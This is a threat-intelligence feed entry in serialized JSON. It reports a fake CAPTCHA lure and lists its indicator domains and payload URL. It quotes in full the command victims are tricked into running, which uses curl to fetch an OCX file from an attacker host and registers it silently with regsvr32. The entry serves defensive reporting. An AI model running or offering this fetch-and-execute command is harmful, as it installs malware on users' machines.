[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fAknzlPzvR1jLUuF1fbLJJCwgSSh54MaySBd7Lcp-E_I":3},{"article":4,"iocs":40,"watch_terms":52},{"id":5,"title":6,"slug":7,"summary":8,"ai_summary":9,"brief":10,"full_text":11,"url":12,"image_url":13,"published_at":14,"ingested_at":15,"relevance_score":16,"entities":17,"category_id":23,"category":24,"article_tags":27},"9da5e3b4-6c65-495c-8ef5-c761a6cf8039","Also related fake captcha page: https:\u002F\u002Fscreenly[.]cam\u002F\nCommand: \"cmd \u002Fc curl -sko %TEMP%\\mscomct...","also-related-fake-captcha-page-https-screenly-cam-command-cmd-c-curl-sko-temp-ms-60c8e4","Also related fake captcha page: https:\u002F\u002Fscreenly[.]cam\u002F\nCommand: \"cmd \u002Fc curl -sko %TEMP%\\mscomctl.ocx https:\u002F\u002Fxtrafftrck[.]net\u002Ffiles\u002Fupdater.ocx &amp;&amp; start \u002Fb regsvr32 \u002Fs \u002Fi %TEMP%\\updater.ocx\"\n🤷‍♂️ https:\u002F\u002Ft.co\u002Ftt3Ci1hRsN","A malware campaign uses a fake CAPTCHA page hosted at screenly[.]cam to social engineer victims into executing malicious commands. The payload downloads a malicious OCX (ActiveX control) file from xtrafftrck[.]net and registers it via regsvr32, establishing code execution on compromised systems. This represents a classic multi-stage attack combining social engineering with Windows COM object exploitation.","Malware campaign distributes fake CAPTCHA page and OCX downloader via command injection.",null,"https:\u002F\u002Fx.com\u002Fmalwrhunterteam\u002Fstatus\u002F2049070678083575965","https:\u002F\u002Fpbs.twimg.com\u002Fmedia\u002FHG_BtafagAAps8O.png","2026-04-28T10:18:14+00:00","2026-04-28T11:00:10.0972+00:00",7,[18,21],{"name":19,"type":20},"ActiveX\u002FOCX","technology",{"name":22,"type":20},"regsvr32","89f78b1c-3503-45a1-9fc7-e23d2ce1c6d5",{"id":23,"icon":11,"name":25,"slug":26},"Malware","malware",[28,33,35],{"category":29},{"id":30,"icon":11,"name":31,"slug":32},"26b0b636-0e31-4db1-bffb-61bdf9f20a58","Supply Chain","supply-chain",{"category":34},{"id":23,"icon":11,"name":25,"slug":26},{"category":36},{"id":37,"icon":11,"name":38,"slug":39},"e7b231c8-5f79-4465-8d38-1ef13aea5a14","Threat Intelligence","threat-intelligence",[41,45,48],{"type":42,"value":43,"context":44},"domain","screenly.cam","Fake CAPTCHA phishing page hosting social engineering lure",{"type":42,"value":46,"context":47},"xtrafftrck.net","C2\u002Fmalware distribution server hosting malicious OCX file (updater.ocx)",{"type":49,"value":50,"context":51},"url","https:\u002F\u002Fxtrafftrck.net\u002Ffiles\u002Fupdater.ocx","Direct malicious OCX payload download URL",[]]